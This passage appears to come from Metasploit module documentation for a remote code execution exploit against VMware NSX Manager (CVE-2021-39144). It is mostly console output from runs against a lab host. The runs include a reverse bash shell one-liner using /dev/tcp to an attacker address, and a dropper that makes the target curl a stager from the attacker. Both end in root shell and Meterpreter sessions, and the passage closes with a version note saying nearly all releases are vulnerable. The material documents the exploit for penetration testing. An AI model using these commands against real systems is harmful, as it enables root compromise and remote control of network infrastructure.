   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)


msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.5:443 can be exploited !
[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
[*] Executing Unix (In-Memory) with bash -c '0<&44-;exec 44<>/dev/tcp/192.168.100.7/4444;sh <&44 >&44 2>&44'
[*] Command shell session 14 opened (192.168.100.7:4444 -> 192.168.100.5:42512) at 2022-11-05 10:33:37 +0000

pwd
/usr/lib/tanuki/bin
whoami
root
exit
[*] 192.168.100.5 - Command shell session 14 closed.
```
```
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options

Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.100.5    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.5:443 can be exploited !
[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
[*] Executing Linux Dropper
[*] Using URL: http://192.168.100.7:8080/G5xrKmpiufcQdCt
[*] Client 192.168.100.5 (curl/7.81.0) requested /G5xrKmpiufcQdCt
[*] Sending payload to 192.168.100.5 (curl/7.81.0)
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Sending stage (3045348 bytes) to 192.168.100.5
[*] Meterpreter session 13 opened (192.168.100.7:4444 -> 192.168.100.5:42384) at 2022-11-05 10:29:30 +0000
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.100.5
OS           : NSX Manager 6.4.13 (Linux 4.9.297)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
## Limitations
The vulnerability check is limited in detecting that VMWare NSX Manager (NSX-V) is running without obtaining the version information.
However all VMware NSX Manager versions up to `6.4.13` are vulnerable, except for `6.4.14`, so most detected targets are likely to be vulnerable.